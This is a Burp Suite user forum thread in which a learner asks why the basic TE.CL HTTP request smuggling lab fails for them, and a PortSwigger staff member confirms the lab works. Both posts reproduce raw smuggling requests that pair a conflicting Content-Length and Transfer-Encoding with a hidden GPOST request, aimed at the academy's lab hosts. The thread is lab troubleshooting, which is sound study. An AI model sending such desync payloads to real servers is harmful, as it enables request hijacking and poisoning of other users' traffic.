Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

Pung | Last updated: Jun 11, 2023 03:42AM UTC

It seems that I still cannot exploit this vulnerability even though request smuggler picked it up in the scan. I have reused what the scanner used and still cannot get the desired result. I even went on to the solution to copy and pasted the solution to my repeater to replicate the vulnerability and still getting 200 back instead of the GPOST issue. Please let me know what I did wrong. really curious. This is the request made by the scanner which I reused in repeater. Not getting the error back. ``` POST / HTTP/1.1 Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net Cookie: session=sKiDOv38QeI0YfqdBneTeOXoTVRqnwgA; User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Content-Length: 12 Transfer-Encoding: chunked 2 0 ``` This is the solution I grep from the academy. Also not getting the GPOST. ``` POST / HTTP/1.1 Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 ``` I have the newlines in the request already, I disabled update-content length and changed to HTTP/1.1 already. Not sure where I did wrong.

Dominyque, PortSwigger Agent | Last updated: Jun 12, 2023 12:56PM UTC

Hi We just tested this lab and can confirm that it works as it should. This was the request I sent: POST / HTTP/1.1 Host: 0a310057037750028057e95100b4008a.web-security-academy.net Cookie: session=nkc96G02hZ2WbH9JzD5koyPrNsC9nVko Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked Connection: keep-alive 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 Following along with the community solution video also helped.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.